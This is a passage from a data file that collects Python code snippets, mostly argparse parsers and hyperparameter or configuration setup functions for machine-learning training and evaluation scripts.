default=False, help='Load the Best Saved Model')\n parser.add_argument('--modelType', type=str, help='The Model Type to Use')\n parser.add_argument('--toTrain', type=str2bool, default=True, help='Flag to train or evaluate the model')\n parser.add_argument('--fullVocab', type=str2bool, default=True, help='Use the full vocab or generate vocab based only upon the data used for training')\n parser.add_argument('--trainSize', type=int, default=128, 
help='Size of training data')\n parser.add_argument('--valSize', type=int, default=16, help='Size of validation data')\n parser.add_argument('--tfThresh', type=float, default=0.0, help='Amount of time to not do teacher forcing during training')\n parser.add_argument('--beamSize', type=int, default=0, help='Beam size for beam search. 0 means no beam search')\n\n args = parser.parse_args()\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Factorized Spatial Embeddings\")\n parser.add_argument(\"--mode\", default=MODE, choices=[\"train\", \"test\"])\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--input_dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the training or testing images.\")\n parser.add_argument(\"--K\", type=int, default=LANDMARK_N,\n help=\"Number of landmarks.\")\n parser.add_argument(\"--scale_size\", type=int, default=SCALE_SIZE,\n help=\"Scale images to this size before cropping to CROP_SIZE\")\n parser.add_argument(\"--crop_size\", type=int, default=CROP_SIZE,\n help=\"CROP images to this size\")\n parser.add_argument(\"--checkpoint\", default=CHECKPOINT,\n help=\"Directory with checkpoint to resume training from or use for testing\")\n parser.add_argument(\"--output_dir\", default=OUTPUT_DIR,\n help=\"Where to put output files\")\n parser.add_argument(\"--img_folder\",type=str, default='images',help=\"save the predicted landmarks\")\n \n return parser.parse_args()", "def __init__(self, args):\n self.batch_size = args.pop(\"batch_size\", 4096)\n self.iteration = args.pop(\"iteration\", 0)\n self.learning_rate = args.pop(\"learning_rate\", 0.003)\n self.learning_rate_decay = args.pop(\"learning_rate_decay\", 0.7)\n self.training_epochs = args.pop(\"training_epochs\", 10)\n self.training_history = args.pop(\"training_history\", [])\n self.tf_summary_writer = None\n with self.graph.as_default():\n self.tf_learning_rate = tf.placeholder(tf.float32)", "def _setup_misc(self, mode):\n self.lr_rate_ph = tf.Variable(0.0, name='lrn_rate', trainable=False)\n self.reuse = None if (mode == 'train') else True\n self.batch_size = self.hparams.batch_size\n if mode == 'eval':\n self.batch_size = 25", "def initialize():\n\n parser = build_arg_parser()\n par = parser.parse_known_args()[0]\n\n # Main arguments.\n set('run_mode', par.run_mode)\n set('input_files', par.image)\n\n # Sub-parser specific arguments.\n if par.run_mode == 'train':\n\n set('batch_size', par.batch_size)\n set('drop', par.drop)\n set('epochs', par.epochs)\n set('model', par.model)\n set('level', par.level)\n set('vfrac', par.vfrac)\n set('data_augm', par.data_augm)\n set('summary', par.summary)\n set('outdir', par.outdir)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n set('discriminator', par.discriminator)\n\n elif par.run_mode == 'predict':\n\n set('tile_edge', par.edge)\n set('model', par.model)\n set('save_conv2d_kernels', par.save_conv2d_kernels) \n set('save_conv2d_outputs', par.save_conv2d_outputs) \n set('colormap', par.colormap)\n # Parameters associated with super-resolution. 
\n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n\n elif par.run_mode == 'diagnose': \n \n set('model', par.model) \n \n else:\n \n pass", "def parse_args(args):\n parser = argparse.ArgumentParser(description='Training parameters')\n #\n # parser.add_argument('--type', type=str, default='DDQN',help=\"Algorithm to train from {A2C, A3C, DDQN, DDPG}\")\n # parser.add_argument('--is_atari', dest='is_atari', action='store_true', help=\"Atari Environment\")\n # parser.add_argument('--with_PER', dest='with_per', action='store_true', help=\"Use Prioritized Experience Replay (DDQN + PER)\")\n # parser.add_argument('--dueling', dest='dueling', action='store_true', help=\"Use a Dueling Architecture (DDQN)\")\n # #\n # parser.add_argument('--nb_episodes', type=int, default=5000, help=\"Number of training episodes\")\n # parser.add_argument('--batch_size', type=int, default=64, help=\"Batch size (experience replay)\")\n # parser.add_argument('--consecutive_frames', type=int, default=4, help=\"Number of consecutive frames (action repeat)\")\n # parser.add_argument('--training_interval', type=int, default=30, help=\"Network training frequency\")\n # parser.add_argument('--n_threads', type=int, default=8, help=\"Number of threads (A3C)\")\n # #\n # parser.add_argument('--gather_stats', dest='gather_stats', action='store_true',help=\"Compute Average reward per episode (slower)\")\n # parser.add_argument('--render', dest='render', action='store_true', help=\"Render environment while training\")\n # parser.add_argument('--env', type=str, default='BreakoutNoFrameskip-v4',help=\"OpenAI Gym Environment\")\n # parser.add_argument('--gpu', type=int, default=0, help='GPU ID')\n #\n # parser.set_defaults(render=False)\n parser.add_argument('--lr', type=float, default=0.0005)\n parser.add_argument('--ep', type=int, default=2000)\n parser.add_argument('--gpu', type=str, default=\"-1\", help='GPU ID')\n\n return parser.parse_args(args)", "def args_to_add(cls, index=None) -> [Argument]:\n return super().args_to_add(index) + [\n Argument('load', default=\"False\", type=str, help='load the cached weights or continue', is_bool=True),\n Argument('batches_forward', default=0, type=int, help='num batches to forward the network, to adapt bn'),\n Argument('batches_train', default=0, type=int, help='num batches to train the network, -1 for an epoch'),\n Argument('batches_eval', default=-1, type=int, help='num batches to train the network, -1 for an epoch'),\n Argument('value', default='val/accuracy/1', type=str, help='which top k value to optimize'),\n ]", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"resnet based fcn Network\")\n parser.add_argument(\"--epochs\", type=int, default=epochs)\n parser.add_argument(\"--image_size\", type=int, default=image_size)\n parser.add_argument(\"--learning_rate\", type=float, default=learning_rate)\n return parser.parse_args()", "def prepare_args():\n parser = argparse.ArgumentParser(description='Args for training')\n \"\"\"Optional arguments for pre-split train/test files\n parser.add_argument('--train_file', type=str, default='data/train.npy')\n parser.add_argument('--test_file', type=str, default='data/test.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/train_labels.npy')\n \"\"\"\n parser.add_argument('--dataset_file', type=str, default='data/dev.npy')\n parser.add_argument('--label_file',\n type=str,\n default='data/dev_labels.npy')\n parser.add_argument('--context', type=int, default=1)\n 
parser.add_argument('--batch_size', type=int, default=8)\n parser.add_argument('--optimizer', type=str, default='SGD')\n parser.add_argument('--model_name', type=str, default='SimpleNet')\n parser.add_argument('--lr', type=float, default=3e-4)\n parser.add_argument('--wd', type=float, default=0)\n parser.add_argument('--num_epochs', type=int, default=1000)\n parser.add_argument('--shuffle', action='store_true')\n args_to_ret = parser.parse_args()\n return args_to_ret", "def Params(cls):\n p = super().Params()\n p.Define('train_task', None, 'Underlying task')\n p.Define('decode_task', None, 'Underlying task')\n p.Define('train_dataset_name', None, '')\n p.Define('decode_dataset_name', None, '')\n p.Define('train_steps_per_loop', 0, '')\n p.Define('decode_steps_per_loop', 0, '')\n return p", "def set_defaults(args):\n # Check critical files exist\n args.train_file = os.path.join(args.data_dir, args.train_file)\n if not os.path.isfile(args.train_file):\n raise IOError('No such file: %s' % args.train_file)\n args.dev_file = os.path.join(args.data_dir, args.dev_file)\n if not os.path.isfile(args.dev_file):\n raise IOError('No such file: %s' % args.dev_file)\n if args.embedding_file:\n args.embedding_file = os.path.join(args.embed_dir, args.embedding_file)\n if not os.path.isfile(args.embedding_file):\n raise IOError('No such file: %s' % args.embedding_file)\n\n # Set model directory\n subprocess.call(['mkdir', '-p', args.model_dir])\n\n # Set model name\n if not args.model_name:\n import uuid\n import time\n args.model_name = time.strftime(\"%Y%m%d-\") + str(uuid.uuid4())[:8]\n\n # Set log + model file names\n args.log_file = os.path.join(args.model_dir, args.model_name + '.txt')\n args.model_file = os.path.join(args.model_dir, args.model_name + '.pt')\n\n # Embeddings options\n if args.embedding_file:\n with open(args.embedding_file) as f:\n dim = len(f.readline().strip().split(' ')) - 1\n args.embedding_dim = dim\n elif not args.embedding_dim:\n raise RuntimeError('Either embedding_file or embedding_dim '\n 'needs to be specified.')\n\n # Make sure fix_embeddings and embedding_file are consistent\n if args.fix_embeddings:\n if not (args.embedding_file or args.pretrained):\n logger.warning('WARN: fix_embeddings set to False '\n 'as embeddings are random.')\n args.fix_embeddings = False\n return args", "def predict_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('image', type = str, help = 'Path to the folder and file name of image to be checked') \n parser.add_argument('checkpoint', type = str, help = 'Checkpoint folder name') \n parser.add_argument('--gpu', type = bool, default = False, help = 'True = GPU enabled, False = GPU disabled') \n parser.add_argument('--topk', type = int, default = 5, help = 'Top number of class predicitions') \n parser.add_argument('--json', type = str, default = 'cat_to_name.json', help = 'Path to the folder and file name of JSON map used') \n return parser.parse_args()", "def add_args(parser):\n NATransformerModel.add_args(parser)\n parser.add_argument('--share-encoder-embeddings', action='store_true',\n help='share encoder embeddings across languages')\n parser.add_argument('--share-decoder-embeddings', action='store_true',\n help='share decoder embeddings across languages')\n parser.add_argument('--share-encoders', action='store_true',\n help='share encoders across languages')\n parser.add_argument('--student-arch', default=\"nonautoregressive_transformer\",\n help='determine the type of student 
network to mutual learn from.') \n parser.add_argument('--teacher-arch', default=\"transformer\",\n help='determine the type of teacher network to mutual learn from.')\n\n parser.add_argument('--load-to-teacher', action='store_true',\n help='load checkpoint to teacher network.')\n parser.add_argument('--freeze-teacher', action='store_true',\n help='whether to freeze teacher.')\n\n parser.add_argument(\"--student-kd-factor\",\n default=.5,\n type=float,\n help=\"weights on the knowledge distillation loss for training student\"\n )\n parser.add_argument(\"--teacher-kd-factor\",\n default=.5,\n type=float,\n help=\"weights on the knowledge distillation loss for training teacher\"\n )\n parser.add_argument(\"--control-kd-factor\", action=\"store_true\",\n help=\"use the PI algorithm introduced in ControlVAE to calculate the weight on KL-divergence on latent.\")\n parser.add_argument('--control-kd-args', type=str, metavar='JSON',\n help=\"\"\"args for ControlVAE, a valid setup is: '{\"v_kl\": 3.0, \"Kp\": 0.01, \"Ki\": 0.0001, \"beta_min\": 0.0, \"beta_max\": 1.0 }' \"\"\")\n\n\n # inference flags\n parser.add_argument('--reduce-to-student', action='store_true',\n help='when inference, only load student network.')\n parser.add_argument('--reduce-to-teacher', action='store_true',\n help='when inference, only load teacher network.')", "def train_dagger(): # add arguments as needed\n pass", "def get_args():\n\n parser = argparse.ArgumentParser(description='PyTorch BERT Model')\n parser = add_model_config_args(parser)\n parser = add_fp16_config_args(parser)\n parser = add_training_args(parser)\n parser = add_evaluation_args(parser)\n parser = add_data_args(parser)\n\n args = parser.parse_args()\n\n args.cuda = torch.cuda.is_available()\n args.rank = int(os.getenv('RANK', '0'))\n args.world_size = int(os.getenv(\"WORLD_SIZE\", '1'))\n\n args.dynamic_loss_scale = False\n if args.loss_scale is None:\n args.dynamic_loss_scale = True\n print(' > using dynamic loss scaling')\n\n # The args fp32_* or fp16_* meant to be active when the\n # args fp16 is set. 
So the default behaviour should all\n # be false.\n if not args.fp16:\n args.fp32_embedding = False\n args.fp32_tokentypes = False\n args.fp32_layernorm = False\n\n print_args(args)\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Factorized Spatial Embeddings\")\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--input_dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the training or testing images.\")\n parser.add_argument(\"--learning_rate\", type=float, default=LEARNING_RATE,\n help=\"Learning rate for adam.\")\n parser.add_argument(\"--beta1\", type=float, default=MOMENTUM,\n help=\"Momentum component of the optimiser.\")\n parser.add_argument(\"--K\", type=int, default=LANDMARK_N,\n help=\"Number of landmarks.\")\n parser.add_argument(\"--M\", type=int, default=DOWNSAMPLE_M,\n help=\"Downsampling value of the diversity loss.\")\n parser.add_argument(\"--weight_decay\", type=float, default=WEIGHT_DECAY,\n help=\"Regularisation parameter for L2-loss.\")\n parser.add_argument(\"--diversity_weight\", type=float, default=DIVERSITY,\n help=\"Weight on diversity loss.\")\n parser.add_argument(\"--align_weight\", type=float, default=ALIGN,\n help=\"Weight on align loss.\")\n parser.add_argument(\"--scale_size\", type=int, default=SCALE_SIZE,\n help=\"Scale images to this size before cropping to CROP_SIZE\")\n parser.add_argument(\"--crop_size\", type=int, default=CROP_SIZE,\n help=\"CROP images to this size\")\n parser.add_argument(\"--max_epochs\", type=int, default=MAX_EPOCH,\n help=\"Number of training epochs\")\n parser.add_argument(\"--checkpoint\", default=CHECKPOINT,\n help=\"Directory with checkpoint to resume training from or use for testing\")\n parser.add_argument(\"--output_dir\", default=OUTPUT_DIR,\n help=\"Where to put output files\")\n parser.add_argument(\"--save_freq\", type=int, default=SAVE_FREQ, help=\"Save model every save_freq steps\")\n return parser.parse_args()", "def get_inner_training_args(self, eval=False):\n inner_training_args = TrainArgs(\n min_steps=self.num_inner_steps if not eval else self.num_inner_steps_eval,\n max_steps=self.num_inner_steps if not eval else self.num_inner_steps_eval,\n log_every_n_steps=self.log_every_n_steps,\n weights_summary=None, # Do not show model summary\n progress_bar_refresh_rate=0 # Do not show training progress bar\n )\n if torch.cuda.is_available():\n inner_training_args.kwargs['gpus'] = 1\n return inner_training_args", "def __init__(self):\n self.num_examples_per_epoch = 99999\n self.optimizer = \"Adam\"\n # Learning rate for the initial phase of training.\n self.initial_learning_rate = 0.0001\n self.learning_rate_decay_factor = 0.5\n self.num_epochs_per_decay = 8.0\n\n # Learning rate when fine tuning the Inception v3 parameters.\n self.train_inception_learning_rate = 0.0001\n\n # If not None, clip gradients to this value.\n self.clip_gradients = 5.0\n\n # How many model checkpoints to keep.\n self.max_checkpoints_to_keep = 5000", "def _set_params(self, estimator_args, scaler_args, execution_args, metric_args=None, dim_reduction_args=None):\n \n # Set default values which will be used if execution arguments are not passed\n \n # Default parameters:\n self.model.overwrite = True\n self.model.debug = False\n self.model.test_size = 0.33\n self.model.cv = 0\n self.model.time_series_split = 0\n self.model.max_train_size = None\n self.model.random_state = 
42\n self.model.compress = 3\n self.model.retain_data = False\n self.model.scale_hashed = True\n self.model.scale_vectors = True\n self.model.scaler = \"StandardScaler\"\n self.model.scaler_kwargs = {}\n self.model.estimator_kwargs = {}\n self.model.missing = \"zeros\"\n self.model.calc_feature_importances = False\n self.model.importances_n_repeats = 30\n self.model.lags= None\n self.model.lag_target = False\n self.model.scale_target = False\n self.model.scale_lag_target= True\n self.model.make_stationary = None\n self.model.stationarity_lags = [1]\n self.model.using_keras = False\n self.model.current_sample_as_input = True\n self.model.prediction_periods = 1\n \n # Default metric parameters:\n if metric_args is None:\n self.model.metric_args = {}\n \n # Set execution parameters\n \n # If the execution key word arguments were included in the request, get the parameters and values\n if len(execution_args) > 0:\n \n # Transform the string of arguments into a dictionary\n execution_args = utils.get_kwargs(execution_args)\n \n # Set the overwite parameter if any existing model with the specified name should be overwritten\n if 'overwrite' in execution_args:\n self.model.overwrite = 'true' == execution_args['overwrite'].lower()\n \n # Set the test_size parameter that will be used to split the samples into training and testing data sets\n # Default value is 0.33, i.e. we use 66% of the samples for training and 33% for testing\n if 'test_size' in execution_args:\n self.model.test_size = utils.atof(execution_args['test_size'])\n\n # Enable K-fold cross validation. For more information see: http://scikit-learn.org/stable/modules/cross_validation.html#multimetric-cross-validation\n # Default value is 0 in which case a simple holdout strategy based on the test_size parameter is used.\n # If cv > 0 then the model is validated used K = cv folds and the test_size parameter is ignored.\n if 'cv' in execution_args:\n self.model.cv = utils.atoi(execution_args['cv'])\n \n # Enable timeseries backtesting using TimeSeriesSplit. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.TimeSeriesSplit.html\n # This will select the a validation strategy appropriate for time series and sequential data.\n # The feature definitions must include an 'identifier' field which can be used to sort the series into the correct order.\n # The integer supplied in this parameter will split the data into the given number of subsets for training and testing.\n if 'time_series_split' in execution_args:\n self.model.time_series_split = utils.atoi(execution_args['time_series_split'])\n\n # This parameter can be used together with time_series_split.\n # It specifies the maximum samples to be used for training in each split, which allows for rolling/ walk forward validation.\n if 'max_train_size' in execution_args:\n self.model.max_train_size = utils.atoi(execution_args['max_train_size'])\n\n # Add lag observations to the feature matrix. Only applicable for Keras models.\n # An identifier field must be included in the feature definitions to correctly sort the data for this capability.\n # For e.g. 
if lags=2, features from the previous two samples will be concatenated as input features for the current sample.\n # This is useful for framing timeseries and sequence prediction problems into 3D or 4D data required for deep learning.\n if 'lags' in execution_args:\n self.model.lags = utils.atoi(execution_args['lags'])\n\n # Include targets in the lag observations\n # If True an additional feature will be created for each sample using the previous value of y \n if 'lag_target' in execution_args:\n self.model.lag_target = 'true' == execution_args['lag_target'].lower()\n \n # Scale the target before fitting\n # The scaling will be inversed before predictions so they are returned in the original scale \n if 'scale_target' in execution_args:\n self.model.scale_target = 'true' == execution_args['scale_target'].lower()\n\n # Scale lag values of the targets before fitting\n # Even if scale_target is set to false, the lag values of targets being used as features can be scaled by setting this to true \n if 'scale_lag_target' in execution_args:\n self.model.scale_lag_target = 'true' == execution_args['scale_lag_target'].lower()\n\n # Make the target series more stationary. This only applies to sequence prediction problems.\n # Valid values are 'log' in which case we apply a logarithm to the target values,\n # or 'difference' in which case we transform the targets into variance from the previous value.\n # The transformation will be reversed before returning predictions.\n if 'make_stationary' in execution_args:\n self.model.make_stationary = execution_args['make_stationary'].lower()\n\n # Provide lags periods for differencing\n # By default the difference will be done with lag = 1. Alternate lags can be provided by passing a list of lags as a list.\n # e.g. 'stationarity_lags=1;12|list|int'\n if 'stationarity_lags' in execution_args:\n self.model.stationarity_lags = utils.get_kwargs_by_type({'stationarity_lags': execution_args['stationarity_lags']})['stationarity_lags']\n\n # Specify if the current sample should be used as input to the model\n # This is to allow for models that only use lag observations to make future predictions\n if 'current_sample_as_input' in execution_args:\n self.model.current_sample_as_input = 'true' == execution_args['current_sample_as_input'].lower()\n\n # Specify the number of predictions expected from the model\n # This can be used to get a model to predict the next m periods given inputs for the previous n periods.\n # This is only valid for Keras models which have a final output layer with more than one node\n if 'prediction_periods' in execution_args:\n self.model.prediction_periods = utils.atoi(execution_args['prediction_periods'])\n \n # Seed used by the random number generator when generating the training testing split\n if 'random_state' in execution_args:\n self.model.random_state = utils.atoi(execution_args['random_state'])\n \n # Compression level between 1-9 used by joblib when saving the model\n if 'compress' in execution_args:\n self.model.compress = utils.atoi(execution_args['compress'])\n \n # Flag to determine if the training and test data should be saved in the model\n if 'retain_data' in execution_args:\n self.model.retain_data = 'true' == execution_args['retain_data'].lower()\n\n # Flag to determine if feature importances should be calculated when the fit method is called\n if 'calculate_importances' in execution_args:\n self.model.calc_feature_importances = 'true' == execution_args['calculate_importances'].lower()\n\n # Sets the number of times a 
feature is randomly shuffled during the feature importance calculation\n if 'importances_n_repeats' in execution_args:\n self.model.importances_n_repeats = utils.atoi(execution_args['importances_n_repeats'])\n \n # Set the debug option for generating execution logs\n # Valid values are: true, false\n if 'debug' in execution_args:\n self.model.debug = 'true' == execution_args['debug'].lower()\n \n # Additional information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n # Increment log counter for the class. Each instance of the class generates a new log.\n self.__class__.log_no += 1\n\n # Create a log file for the instance\n # Logs will be stored in ..\\logs\\SKLearn Log <n>.txt\n self.logfile = os.path.join(os.getcwd(), 'logs', 'SKLearn Log {}.txt'.format(self.log_no))\n \n # Create dictionary of parameters to display for debug\n self.exec_params = {\"overwrite\":self.model.overwrite, \"test_size\":self.model.test_size, \"cv\":self.model.cv,\\\n \"time_series_split\": self.model.time_series_split, \"max_train_size\":self.model.max_train_size, \"lags\":self.model.lags,\\\n \"lag_target\":self.model.lag_target, \"scale_target\":self.model.scale_target, \"make_stationary\":self.model.make_stationary,\\\n \"random_state\":self.model.random_state, \"compress\":self.model.compress, \"retain_data\":self.model.retain_data,\\\n \"calculate_importances\": self.model.calc_feature_importances, \"importances_n_repeats\": self.model.importances_n_repeats,\\\n \"debug\":self.model.debug}\n\n self._print_log(1)\n \n # If the scaler key word arguments were included in the request, get the parameters and values\n if len(scaler_args) > 0:\n \n # Transform the string of arguments into a dictionary\n scaler_args = utils.get_kwargs(scaler_args)\n \n # Set scaler arguments that will be used when preprocessing the data\n # Valid values are: StandardScaler, MinMaxScaler, MaxAbsScaler, RobustScaler and QuantileTransformer\n # More information here: http://scikit-learn.org/stable/modules/preprocessing.html\n if 'scaler' in scaler_args:\n self.model.scaler = scaler_args.pop('scaler')\n \n if 'missing' in scaler_args:\n self.model.missing = scaler_args.pop('missing').lower()\n \n if 'scale_hashed' in scaler_args:\n self.model.scale_hashed = 'true' == scaler_args.pop('scale_hashed').lower()\n \n if 'scale_vectors' in scaler_args:\n self.model.scale_vectors = 'true' == scaler_args.pop('scale_vectors').lower()\n \n # Get the rest of the scaler parameters, converting values to the correct data type\n self.model.scaler_kwargs = utils.get_kwargs_by_type(scaler_args) \n else:\n err = \"Arguments for scaling did not include the scaler name e.g StandardScaler\"\n raise Exception(err)\n \n # If the estimator key word arguments were included in the request, get the parameters and values\n if len(estimator_args) > 0:\n \n # Transform the string of arguments into a dictionary\n estimator_args = utils.get_kwargs(estimator_args)\n \n # Set estimator arguments that will be used when preprocessing the data\n # The parameters available will depend on the selected estimator\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'estimator' in estimator_args:\n self.model.estimator = estimator_args.pop('estimator')\n \n # Set the estimator type for the model\n if self.model.estimator in self.classifiers:\n self.model.estimator_type = \"classifier\"\n elif self.model.estimator in self.regressors:\n self.model.estimator_type = \"regressor\"\n elif 
self.model.estimator in self.decomposers:\n self.model.estimator_type = \"decomposer\"\n elif self.model.estimator in self.clusterers:\n self.model.estimator_type = \"clusterer\"\n else:\n err = \"Unknown estimator class: {0}\".format(self.model.estimator)\n raise Exception(err)\n\n # Get the rest of the estimator parameters, converting values to the correct data type\n self.model.estimator_kwargs = utils.get_kwargs_by_type(estimator_args) \n else:\n err = \"Arguments for estimator did not include the estimator class e.g. RandomForestClassifier\"\n raise Exception(err)\n \n # If key word arguments for model evaluation metrics are included in the request, get the parameters and values\n if metric_args is not None and len(metric_args) > 0:\n # Transform the string of arguments into a dictionary\n metric_args = utils.get_kwargs(metric_args)\n \n # Get the metric parameters, converting values to the correct data type\n self.model.metric_args = utils.get_kwargs_by_type(metric_args) \n \n # If key word arguments for dimensionality reduction are included in the request, get the parameters and values\n if dim_reduction_args is not None and len(dim_reduction_args) > 0:\n # Transform the string of arguments into a dictionary\n dim_reduction_args = utils.get_kwargs(dim_reduction_args)\n \n # Set dim_reduction arguments that will be used after preprocessing the data\n # The parameters available will depend on the selected dimensionality reduction method\n # Acceptable classes are PCA, KernelPCA, IncrementalPCA, TruncatedSVD\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'reduction' in dim_reduction_args:\n self.model.reduction = dim_reduction_args.pop('reduction')\n \n # Get the rest of the dim_reduction parameters, converting values to the correct data type\n self.model.dim_reduction_args = utils.get_kwargs_by_type(dim_reduction_args) \n else:\n err = \"Arguments for dimensionality reduction did not include the class e.g. 
PCA\"\n raise Exception(err)\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(2)", "def parse_arguments():\n parser = argparse.ArgumentParser()\n _files = training_file()\n parser.add_argument('--img_width',\n type=int,\n default=128,\n help='Input image width')\n parser.add_argument('--second_phase_width',\n type=int,\n default=256,\n help='Input image width for second phase of training')\n parser.add_argument('--third_phase_width',\n type=int,\n default=512,\n help='Input image width for second phase of training')\n parser.add_argument('--start_epoch',\n type=int,\n default=0,\n help='Training start epoch')\n parser.add_argument('--stop_epoch',\n type=int,\n default=6,\n help='Training stop epoch')\n parser.add_argument('--stop_second_phase',\n type=int,\n default=20,\n help='Training stop epoch for second phase')\n parser.add_argument('--stop_third_phase',\n type=int,\n default=25,\n help='Training stop epoch for third phase')\n parser.add_argument('--run_name',\n type=str,\n default=datetime.datetime.now().strftime('%Y:%m:%d:%H:%M:%S'),\n help='Training run name')\n parser.add_argument('--fonts',\n action='append',\n type=str,\n help='Fonts for training')\n parser.add_argument('--major_font',\n type=str,\n help='Major font to use')\n parser.add_argument('--data_dir',\n type=str,\n default=_files.data_dir,\n help='Data directory')\n parser.add_argument('--model_dir',\n type=str,\n default=_files.model_dir,\n help='Model directory')\n parser.add_argument('--not_save_model',\n dest='save_model',\n action='store_false',\n help='Saves network model to yaml file.')\n (args, _) = parser.parse_known_args()\n global flag_args\n flag_args = args\n \n return args", "def add_args(parser):\n # fmt: off\n parser.add_argument(\"--hidden-size\", type=int, default=512)\n parser.add_argument(\"--max-epochs\", type=int, default=1000)\n parser.add_argument(\"--sample-size\", type=int, default=500)\n parser.add_argument(\"--batch-size\", type=int, default=4)\n # fmt: on", "def __init__(self, *args, **kwargs):\n self._observation_space = kwargs['observation_space']\n self._action_space = kwargs['action_space']\n self._seed = kwargs['seed']\n self._lr = kwargs['lr']\n self._gamma = kwargs['gamma']\n self._batch_size = kwargs['batch_size']\n\n if self._seed:\n from drl.tools.misc_util import set_seeds\n set_seeds(self._seed)\n\n #TODO:OpenAI baselines has helpers for the observation inputs..\n # this time we go ham on the class, but this could be made automatically\n #here", "def __init__(self):\n self.args = self._prepare_args(locals())\n self.requires_full_dataset_in_memory = False", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(usage='Creates an ensemble of classifiers based on majority voting.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n return parser.parse_args()", "def add_args(parser):\n # fmt: off\n # todo 先不管这些, 我们后续一个个改成对应的\n parser.add_argument('--embed-dim', type=int, metavar='N',\n help='embedding dimension')\n parser.add_argument('--num-attention-heads', type=int, metavar='N',\n help='num attention heads')\n parser.add_argument('--num-layers', type=int, metavar='N',\n help='num layers')\n parser.add_argument('--dropout', type=float, metavar='D',\n help='dropout probability for all fully connected layers '\n 'in the embeddings, encoder, and 
pooler')\n parser.add_argument('--attention-dropout', type=float, metavar='D',\n help='dropout probability for attention weights')\n\n parser.add_argument('--max-positions', type=int,\n help='number of positional embeddings to learn')\n\n parser.add_argument('--load-hf-bert-from', type=str, default='',\n help='load huggingface pretrained bert from path')\n\n parser.add_argument('--load-hf-bert-config-only', action='store_true',\n help='only load config in the path so we can get a hf model')\n\n parser.add_argument('--quant-noise-pq', type=float, metavar='D', default=0,\n help='iterative PQ quantization noise at training time')\n parser.add_argument('--quant-noise-pq-block-size', type=int, metavar='D', default=8,\n help='block size of quantization noise at training time')\n parser.add_argument('--quant-noise-scalar', type=float, metavar='D', default=0,\n help='scalar quantization noise and scalar quantization at training time')\n # fmt: on", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Generate embedding data for training an urban sound classification model')\n\n parser.add_argument('-e',\n '--num-epochs',\n dest='num_epochs',\n action='store',\n type=int,\n default=150,\n help='(MLP) Maximum number of training epochs')\n\n parser.add_argument('-tbs',\n '--train-batch-size',\n dest='train_batch_size',\n action='store',\n type=int,\n default=64,\n help='(MLP) Number of training examples per batch')\n\n parser.add_argument('-eap',\n '--early-stopping-patience',\n dest='patience',\n action='store',\n type=int,\n default=20,\n help='(MLP) Patience for early stopping')\n\n parser.add_argument('-ps',\n '--parameter-search',\n dest='parameter_search',\n action='store_true',\n help='If True, parameter search will be run')\n\n parser.add_argument('-psnv',\n '--parameter-search-no-valid-fold',\n dest='parameter_search_valid_fold',\n action='store_false',\n help='If True, include validation set in train set and instead get the validation set as a ratio of the training set')\n\n parser.add_argument('-psvr',\n '--parameter-search-valid-ratio',\n dest='parameter_search_valid_ratio',\n action='store',\n type=float,\n default=0.15,\n help='If no validation fold is used, the ratio of the extended training set to set aside for validation')\n\n parser.add_argument('-pstwv',\n '--parameter-search-train-without-valid',\n dest='parameter_search_train_with_valid',\n action='store_false',\n help='If set, do not retrain with validation set')\n\n parser.add_argument('-lr',\n '--learning-rate',\n dest='learning_rate',\n action='store',\n type=float,\n default=1e-4,\n help='(MLP) Optimization learning rate')\n\n parser.add_argument('-wd',\n '--weight-decay',\n dest='weight_decay',\n action='store',\n type=float,\n default=1e-5,\n help='(MLP) L2 regularization penalty factor')\n\n parser.add_argument('-npf',\n '--norm-penalty-factor',\n dest='C',\n action='store',\n type=float,\n default=1.0,\n help='(SVM) norm penalization factor')\n\n parser.add_argument('-sct',\n '--svm-conv-tolerance',\n dest='tol',\n action='store',\n type=float,\n default=0.00001,\n help='(SVM) convergence tolerance threshold')\n\n parser.add_argument('-smi',\n '--svm-max-iterations',\n dest='max_iterations',\n action='store',\n type=int,\n default=-1,\n help='(SVM) maximum iterations')\n\n parser.add_argument('-skt',\n '--svm-kernel-type',\n dest='kernel',\n action='store',\n type=str,\n default='rbf',\n choices=['rbf', 'sigmoid', 'linear', 'poly'],\n help='(SVM) kernel type')\n\n parser.add_argument('-rfne',\n 
'--rf-num-estimators',\n dest='n_estimators',\n action='store',\n type=int,\n default=100,\n help='(RF) Number of decision trees in the random forest')\n\n parser.add_argument('-gsid',\n '--gsheet-id',\n dest='gsheet_id',\n type=str,\n help='Google Spreadsheet ID for centralized logging of experiments')\n\n parser.add_argument('-gdan',\n '--google-dev-app-name',\n dest='google_dev_app_name',\n type=str,\n help='Google Developer Application Name for using API')\n\n parser.add_argument('-r',\n '--random-state',\n dest='random_state',\n action='store',\n type=int,\n default=20171021,\n help='Random seed used to set the RNG state')\n\n parser.add_argument('-v',\n '--verbose',\n dest='verbose',\n action='store_true',\n default=False,\n help='If True, print detailed messages')\n\n parser.add_argument('-fm',\n '--feature-mode',\n dest='feature_mode',\n action='store',\n type=str,\n default='framewise',\n choices=['framewise', 'stats'],\n help='Type of inputs used for model')\n\n parser.add_argument('-mt',\n '--model-type',\n dest='model_type',\n action='store',\n type=str,\n default='svm',\n choices=['svm', 'mlp', 'rf'],\n help='Type of model used for training 